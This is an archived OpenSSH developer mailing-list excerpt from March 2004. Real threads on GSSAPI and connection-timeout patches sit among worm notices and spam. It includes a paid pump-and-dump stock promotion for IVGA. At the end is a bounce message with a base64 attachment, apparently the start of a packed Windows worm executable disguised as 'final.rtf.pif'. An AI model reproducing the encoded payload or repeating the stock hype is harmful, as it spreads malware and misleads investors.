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 eFsoYtubIJ9P8KKdl0Icrn//2Q== ------=_NextPart_000_0012_8EBF5E94.D1C28CC2-- From TALJCQMAWLB at earthlink.net Thu Mar 25 22:32:32 2004 From: TALJCQMAWLB at earthlink.net (Sterling Voss) Date: Thu, 25 Mar 2004 04:32:32 -0700 Subject: Investors Hot Picks, Don't Miss...ninth Message-ID: Our Hot Stock Pick ********************************************** Congratulations to all members who took advantage of our February Stock Pick NEOP - The stock was profiled at 30 cents and reached 80 cents recently ********************************************** NEWS*NEWS*NEWS Invicta Group Inc. Announces Opening of Las Vegas Office Invicta Group Inc. Announces Opening of Las Vegas Office NEWS*NEWS*NEWS Revenues Jan 1 - Feb 29, 2004 were $2,384,587 versus $1,572,085 for the same period in 2003. WATCH FOR MORE NEWS 18th of March and by the end of the week! ++ Top March Trading Alert ++ Company Profile Invicta Group Inc Symbol: IVGA Current Price: $0.11 SPECULATIVE NEAR TERM TARGET PRICE - $0.22 SPECULATIVE LONG TERM TARGET PRICE - $0.27 We Expect some strong demand for this stock in the near future!!!!! Get on Board now and enjoy the bull ride with IVGA Recent News Stories about IVGA: Revenues Jan 1 - Feb 29, 2004 were $2,384,587 versus $1,572,085 for the same period in 2003. ------------------------------------------------------ Invicta Group Inc. Announces Opening of Las Vegas Office About the Company: Invicta Group Inc. is a technology company that specializes in the travel and entertainment industries. The company has three divisions: Travel: engaged in offering airline tickets, hotel rooms, car rentals and other travel-related products over the telephone and Internet (www.dontpayfullfare.com); Entertainment: offering complimentary Casino Resorts rooms, meals, and shows to qualified players at 30 casinos in N. America and the Caribbean (www.casinoratedplayers.com); and Technology: IVGA owns its own search engine: "on the fly faring." IVGA recently acquired ISIP Telecom Group, Inc. (www.isiptelecom.com), which provides the ability to make telephone calls worldwide via the Internet with clear reception at low rates. ISIP Telecom will soon be offering its services to the travel industry, and has already entered into interconnection agreements with major operators in the U.S., Europe, & Latin America via VoIP & PSTN for traffic termination and origination. --------------READ READ READ------------ Invicta Group Inc. Announces Opening of Las Vegas Office ---------------------------------------- MIAMI BEACH, Fla., Mar 15, 2004 /PRNewswire- FirstCall via COMTEX/ -- Invicta Group Inc. (IVGA) announces the opening of its Las Vegas office. Invicta is setting up an inbound tour operation which will offer Las Vegas rooms, car rentals, air transportation, show tickets, limos, sightseeing tours and free rooms to casino qualified players; reservations can be made by phone or on the internet. The name of the newest subsidiary is "Las Vegas Excitement" and can be found online at www.lasvegase . ; the website is under construction and will be operational April 5. "Las Vegas Excitement will offer discounted packages that include: airline tickets, airport transfers and accommodations to customers online, and to our 10,000 travel agents that are customers of our subsidiary Airplan. Our goal is to cross market products within our subsidiaries, offering service and savings to our clients," stated William Forhan, CEO. Airplan is an air consolidator company that offers discounted airline tickets internationally through its B-2-B website: www.airplan.com , marketing its products to the travel agents. Airplan will offer Las Vegas products to its customers, paying 10% commissions for packages purchased. ------------------------------------- --------------- Disclaimer --------------- Please be advised that nothing within this email shall constitute a solicitation or an offer to buy or sell any security mentioned herein. This newsletter is neither a registered investment advisor nor affiliated with any broker or dealer. All statements made are our express opinion only and should be treated as such. We may own, buy and sell any securities mentioned at any time. This report includes forward-looking statements within the meaning of The Private Securities Litigation Reform Act of 1995. These statements may include terms as "expect", "believe", "may", "will", "move", "undervalued" and "intend" or similar terms. This newsletter was paid $3430 from third party to send this report. PLEASE DO YOUR OWN DUE DILIGENCE BEFORE INVESTING IN ANY PROFILED COMPANY. To be removed from further emails send email to...sdsdsd at yahoo.co.uk...n Thu, 25 Mar 2004 10:35:32 -0100 From markus_moeller at compuserve.com Fri Mar 26 10:47:32 2004 From: markus_moeller at compuserve.com (Markus Moeller) Date: Thu, 25 Mar 2004 23:47:32 -0000 Subject: GSSAPI patch for multihomed hosts References: <000801c41137$c51d1ef0$fa00a8c0@home> <20040325155156.GE62344@madman.celabo.org> Message-ID: <000701c412c3$8eebb070$fa00a8c0@home> Jacques, But I think with GSS_C_NO_NAME you loose the mutual authentication. An option to select would be best.. Regards Markus ----- Original Message ----- From: "Jacques A. Vidrine" To: "Markus Moeller" Cc: Sent: Thursday, March 25, 2004 3:51 PM Subject: Re: GSSAPI patch for multihomed hosts > > On Wed, Mar 24, 2004 at 12:34:23AM -0000, Markus Moeller wrote: > > Hi, > > > > This is another attempt to get my gssapi for multi homed systems into > > openssh. Please find attach a small change so that gssapi authentication > > works on multihomed systems. > > I don't think this patch should be applied. At least in the > (MIT|Heimdal) Kerberos case, it is better to simply pass GSS_C_NO_NAME > to gss_acquire_cred to accomplish the same thing. > > More desirable IMHO is a patch for the client to use HostKeyAlias > to compute the GSSAPI name (so that tunneled SSH+GSSAPI connections > work). I have something similar (but uses a different option name). > Due to compatiblity issues, I'm still on OpenSSH 3.6.1+GSSAPI patches, > but when I get a chance to migrate to 3.8 I will post patches here. > > Cheers, > -- > Jacques Vidrine / nectar at celabo.org / jvidrine at verio.net / nectar at freebsd.org > From sales at tolvanen.com Fri Mar 26 14:38:54 2004 From: sales at tolvanen.com (sales at tolvanen.com) Date: Fri, 26 Mar 2004 00:38:54 -0300 Subject: (no subject) Message-ID: <20040326033813.39BBB27C188@shitei.mindrot.org> +++ Attachment: No Virus found +++ MessageLabs AntiVirus - www.messagelabs.com -------------- next part -------------- A non-text attachment was scrubbed... Name: message.zip Type: application/octet-stream Size: 29840 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040326/de9241ba/attachment.obj From roland.mainz at nrubsig.org Fri Mar 26 14:41:06 2004 From: roland.mainz at nrubsig.org (Roland Mainz) Date: Fri, 26 Mar 2004 04:41:06 +0100 Subject: SPAM and other junk posted to openssh-unix-dev@mindrot.org / was: [Fwd: [MailServer Notification]To Recipient virus found and action taken.] Message-ID: <4063A652.5D2757BD@nrubsig.org> Hi! ---- Is it possible to block postings (or let mailman put it into the "approval" queue and let someone approve the non-SPAM postings) from non-list-members to get rid of this SPAM ? -------- Original Message -------- Subject: [MailServer Notification]To Recipient virus found and action taken. Date: Fri, 26 Mar 2004 04:03:34 ??? From: To: ScanMail for Microsoft Exchange has detected virus-infected attachment(s). Sender = openssh-unix-dev-bounces+robert.dahlem=kordoba.de at mindrot.org Recipient(s) = openssh-unix-dev at mindrot.org Subject = Mail Account Scanning time = 03/26/2004 04:03:29 Engine/Pattern = 6.810-1005/837 Action on virus found: The attachment readme_openssh-unix-dev.zip contains WORM_NETSKY.P virus. ScanMail has Quarantined it. The attachment was quarantined to D:\Program Files\Trend\Smex\Virus\readme_openssh-unix-dev40639d821a.zip_. Warnung an Empf??nger: ScanMail hat einen Virus in einer Mail an Sie entdeckt und diesen erfolgreich entfernt. Warning to recipient. ScanMail has detected a virus. _______________________________________________ openssh-unix-dev mailing list openssh-unix-dev at mindrot.org http://www.mindrot.org/mailman/listinfo/openssh-unix-dev From djm at mindrot.org Fri Mar 26 17:13:34 2004 From: djm at mindrot.org (Damien Miller) Date: Fri, 26 Mar 2004 17:13:34 +1100 Subject: SPAM and other junk posted to openssh-unix-dev@mindrot.org / was: [Fwd: [MailServer Notification]To Recipient virus found and action taken.] In-Reply-To: <4063A652.5D2757BD@nrubsig.org> References: <4063A652.5D2757BD@nrubsig.org> Message-ID: <4063CA0E.3080208@mindrot.org> Roland Mainz wrote: > Hi! > > Is it possible to block postings (or let mailman put it into the > "approval" queue and let someone approve the non-SPAM postings) from > non-list-members to get rid of this SPAM ? The list is already pretty heavily filtered, using SpamAssassin, Mailman's internal stuff and a heap of procmail. Pushing stuff into an approval queue is not currently an option, I just don't have enough time to vet messages from non-subscribers. Unless Mailman's approval interface radically improves, I can't see this circumstance changing anytime soon. A better option would be to improve the spam filtering with some additional rulesets (especially ones to catch antivirus adverts^H^H^Hnotifications) and maybe some greylisting. I'll try to implement this as soon as I can. There is a pretty clear cycle in the number of spams that make it through SpamAssassin. It drops right after a stable release and then climbs back up as the spammers get wise. Right now we are well into such a climb, so hopefully the SpamAssassin team will make a new release soon. Until then, please accept my apologies for the inconvenience. This is, unfortunately, one of the costs of having an open list. -d From hpa at yggdrasil.com Sat Mar 27 00:54:33 2004 From: hpa at yggdrasil.com (hpa at yggdrasil.com) Date: Fri, 26 Mar 2004 10:54:33 -0300 Subject: approved document Message-ID: <20040326195058.A5E6427C187@shitei.mindrot.org> Please read the important document. +++ Attachment: No Virus found +++ MC-Afee AntiVirus - www.mcafee.com -------------- next part -------------- A non-text attachment was scrubbed... Name: document_openssh-unix-dev.zip Type: application/octet-stream Size: 29834 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040326/b5a73a07/attachment.obj From mic_bowman at yahoo.com Sat Mar 27 10:19:22 2004 From: mic_bowman at yahoo.com (Mic Bowman) Date: Fri, 26 Mar 2004 15:19:22 -0800 (PST) Subject: Patch for login exchange timeout Message-ID: <20040326231922.62171.qmail@web20802.mail.yahoo.com> Here's a quick patch that adds a timeout (value set from the connection timeout config parameter) for identification exchange. The situation that this fixes is the one where the sshd has a connection open (so you can make a TCP connection) but does not put up a banner (e.g. when the disk has crashed or when file descriptors are exhausted on a machine). Sounds unusual, but this happens with some regularity on PlanetLab (www.planet-lab.org)... Anyway, that situation is not caught be either the ConnectionTimeout, TCPKeepAlive, or the ServerAlive timeouts. This patch just sets an alarm prior to the atomicio call that reads & processes the banner from the sshd. --Mic micbowman at comcast dot net *** sshconnect.c 2004-01-27 02:21:27.000000000 -0800 --- sshconnect-new.c 2004-03-26 14:48:24.000000000 -0800 *************** *** 429,434 **** --- 429,444 ---- } /* + * Signal handler for the alarm after the login grace period has expired. + */ + static void + grace_alarm_handler(int sig) + { + /* Log error and exit. */ + fatal("Timeout before authentication"); } + + /* * Waits for the server identification string, and sends our own * identification string. */ *************** *** 441,446 **** --- 451,462 ---- int connection_out = packet_get_connection_out(); int minor1 = PROTOCOL_MINOR_1; + /* Setup a handler for banner prompt */ + if (options.connection_timeout > 0) { + signal(SIGALRM, grace_alarm_handler); + alarm(options.connection_timeout); + } + /* Read other side\'s version identification. */ for (;;) { for (i = 0; i < sizeof(buf) - 1; i++) { *************** *** 466,471 **** --- 482,494 ---- } server_version_string = xstrdup(buf); + /* Clear the alarm */ + if (options.connection_timeout > 0) { + alarm(0); + signal(SIGALRM,SIG_DFL); + } + + /* * Check that the versions match. In future this might accept * several versions and set appropriate flags to handle them. __________________________________ Do you Yahoo!? Yahoo! Finance Tax Center - File online. File on time. http://taxes.yahoo.com/filing.html From djm at mindrot.org Sat Mar 27 10:23:01 2004 From: djm at mindrot.org (Damien Miller) Date: Sat, 27 Mar 2004 10:23:01 +1100 Subject: SPAM and other junk posted to openssh-unix-dev@mindrot.org / was: [Fwd: [MailServer Notification]To Recipient virus found and action taken.] In-Reply-To: <4063CA0E.3080208@mindrot.org> References: <4063A652.5D2757BD@nrubsig.org> <4063CA0E.3080208@mindrot.org> Message-ID: <4064BB55.2050605@mindrot.org> Damien Miller wrote: > A better option would be to improve the spam filtering with some > additional rulesets (especially ones to catch antivirus > adverts^H^H^Hnotifications) and maybe some greylisting. I'll try to > implement this as soon as I can. The mailing list is now filtered using a bunch of additional rulesets from http://wiki.apache.org/spamassassin/CustomRulesets -d From gleydson at ftp.debian.org Sat Mar 27 10:15:28 2004 From: gleydson at ftp.debian.org (gleydson at ftp.debian.org) Date: Fri, 26 Mar 2004 20:15:28 -0300 Subject: important Message-ID: <20040326233107.0588027C18A@shitei.mindrot.org> Your document is attached. From djm at mindrot.org Sat Mar 27 10:31:18 2004 From: djm at mindrot.org (Damien Miller) Date: Sat, 27 Mar 2004 10:31:18 +1100 Subject: Patch for login exchange timeout In-Reply-To: <20040326231922.62171.qmail@web20802.mail.yahoo.com> References: <20040326231922.62171.qmail@web20802.mail.yahoo.com> Message-ID: <4064BD46.8090603@mindrot.org> Mic Bowman wrote: > Here's a quick patch that adds a timeout (value set > from the connection timeout config parameter) for > identification exchange. I think the idea is ok, but IMO the implementation should do select+timeout rather than use signals. Also, maybe the timeout for the banner exchange should be ConnectionTimeout less the time actually used during the connect phase. -d From micbowman at comcast.net Sat Mar 27 11:10:20 2004 From: micbowman at comcast.net (micbowman at comcast.net) Date: Sat, 27 Mar 2004 00:10:20 +0000 Subject: Patch for login exchange timeout Message-ID: <032720040010.18650.4064C66C0003F49C000048DA2200745672FF919E9288909D9C96@comcast.net> I agree with select/timeout. This was a *fast*, minimal impact to the current code kind of patch. Change it however you want. --Mic > Mic Bowman wrote: > > Here's a quick patch that adds a timeout (value set > > from the connection timeout config parameter) for > > identification exchange. > > I think the idea is ok, but IMO the implementation should do > select+timeout rather than use signals. > > Also, maybe the timeout for the banner exchange should be > ConnectionTimeout less the time actually used during the connect phase. > > -d From roland.mainz at nrubsig.org Sat Mar 27 11:10:48 2004 From: roland.mainz at nrubsig.org (Roland Mainz) Date: Sat, 27 Mar 2004 01:10:48 +0100 Subject: SPAM and other junk posted to openssh-unix-dev@mindrot.org /was: [Fwd: [MailServer Notification]To Recipient virus found and actiontaken.] References: <4063A652.5D2757BD@nrubsig.org> <4063CA0E.3080208@mindrot.org> <4064BB55.2050605@mindrot.org> Message-ID: <4064C688.314EA1D0@nrubsig.org> Damien Miller wrote: > > A better option would be to improve the spam filtering with some > > additional rulesets (especially ones to catch antivirus > > adverts^H^H^Hnotifications) and maybe some greylisting. I'll try to > > implement this as soon as I can. > > The mailing list is now filtered using a bunch of additional rulesets > from http://wiki.apache.org/spamassassin/CustomRulesets Thanks! :) ---- Bye, Roland -- __ . . __ (o.\ \/ /.o) roland.mainz at nrubsig.org \__\/\/__/ MPEG specialist, C&&JAVA&&Sun&&Unix programmer /O /==\ O\ TEL +49 2426 901568 FAX +49 2426 901569 (;O/ \/ \O;) From dtucker at zip.com.au Sat Mar 27 17:46:06 2004 From: dtucker at zip.com.au (Darren Tucker) Date: Sat, 27 Mar 2004 17:46:06 +1100 Subject: Patch for login exchange timeout In-Reply-To: <4064BD46.8090603@mindrot.org> References: <20040326231922.62171.qmail@web20802.mail.yahoo.com> <4064BD46.8090603@mindrot.org> Message-ID: <4065232E.7040408@zip.com.au> Damien Miller wrote: > Mic Bowman wrote: > >>Here's a quick patch that adds a timeout (value set >>from the connection timeout config parameter) for >>identification exchange. > > I think the idea is ok, but IMO the implementation should do > select+timeout rather than use signals. > Also, maybe the timeout for the banner exchange should be > ConnectionTimeout less the time actually used during the connect phase. One possible approach would be to have the initial select() wait for some data from the server (eg the banner), as per the attached patch. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: openssh-connect-timeout.patch Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040327/46431e62/attachment.ksh From djm at mindrot.org Sat Mar 27 20:07:27 2004 From: djm at mindrot.org (Damien Miller) Date: Sat, 27 Mar 2004 20:07:27 +1100 Subject: Disabled accounts Message-ID: <4065444F.10601@mindrot.org> I have received a couple of queries from people who have had emails suggesting that their mailing list subscription had been suspended. This is not a problem with your account, here is what happened: Yesterday someone's broken Outlook mailed a virus to the list. The list has been set up to block executable attachments, but not (until now) zip files, so the virus was forwarded. Some people's mailservers have antivirus filtering enabled, so they bounced the offending message from the list - triggering the list manager software to disable their list membership. I noticed the problem this morning (AEDST) and re-enabled every account that I could find that had been disabled. I also blocked application/octet-stream attachments, and am seriously considering blocking all non-text attachment types. So, apologies for any confusion. Hopefully the new filtering goop will stop this stuff from happening again. -d From ed at membled.com Sat Mar 27 20:56:49 2004 From: ed at membled.com (Ed Avis) Date: Sat, 27 Mar 2004 09:56:49 +0000 (GMT) Subject: SPAM and other junk posted to openssh-unix-dev@mindrot.org In-Reply-To: <20040326195151.9F32427C392@shitei.mindrot.org> Message-ID: You can read the list via , which does its own Spamassassin and ClamAV filtering. But it looks like at the moment SA there is having almost as many troubles as that filtering the list itself. It would be possible to write some new SA rules to catch the 'suspicious message' crap, and then send them to either the list owner or the maintainer of Gmane. -- Ed Avis From MAILER-DAEMON at anet-mail7.anet.ne.jp Sun Mar 28 04:09:23 2004 From: MAILER-DAEMON at anet-mail7.anet.ne.jp (MAILER-DAEMON at anet-mail7.anet.ne.jp) Date: 28 Mar 2004 03:09:23 +0900 Subject: failure notice Message-ID: <20040327180903.BC3D627C187@shitei.mindrot.org> Hi. This is the qmail-send program at anet-mail7.anet.ne.jp. I'm afraid I wasn't able to deliver your message to the following addresses. This is a permanent error; I've given up. Sorry it didn't work out. : sqlforward: fatal: This address not registered --- Below this line is a copy of the message. Return-Path: Received: (qmail 904 invoked by uid 0); 28 Mar 2004 03:09:08 +0900 Received: from unknown (HELO anet.ne.jp) (200.233.66.132) by mail7.anet.ne.jp with SMTP; 28 Mar 2004 03:09:08 +0900 From: openssh-unix-dev at mindrot.org To: sancyo at anet.ne.jp Subject: fake? Date: Sat, 27 Mar 2004 15:09:19 -0300 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0009_00007DF3.00006C56" X-Priority: 3 X-MSMail-Priority: Normal This is a multi-part message in MIME format. ------=_NextPart_000_0009_00007DF3.00006C56 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit correct it! ------=_NextPart_000_0009_00007DF3.00006C56 Content-Type: application/x-zip-compressed; name="final.zip" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="final.zip" UEsDBAoAAAAAACmRezBiZMYWCWMAAAljAAANAAAAZmluYWwucnRmLnBpZk1akAADAAAABAAA AP//AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALgAAABr Il9WL0MxBS9DMQUvQzEFrF8/BSNDMQXHXDsFNEMxBS9DMAVwQzEFrEtsBSJDMQXHXDoFKkMx BZdFNwUuQzEFUmljaC9DMQUAAAAAAAAAAENvbXByZXNzZWQgYnkgUGV0aXRlIChjKTE5OTkg SWFuIEx1Y2suAABQRQAATAEDAOynO0AAAAAAAAAAAOAADwELAQYAAFAAAAAcAQAAAAAAQqAB AAAQAAAAYAAAAABAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAACwAQAABAAAAAAAAAIAAAAA ABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAAPyhAQCvAQAAAJABAAgFAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAB AAAQAAAAVgAAAAgAAAAAAAAAAAAAAAAAAGAAAOAucGV0aXRlAAAQAAAAkAEACAUAAABeAAAA 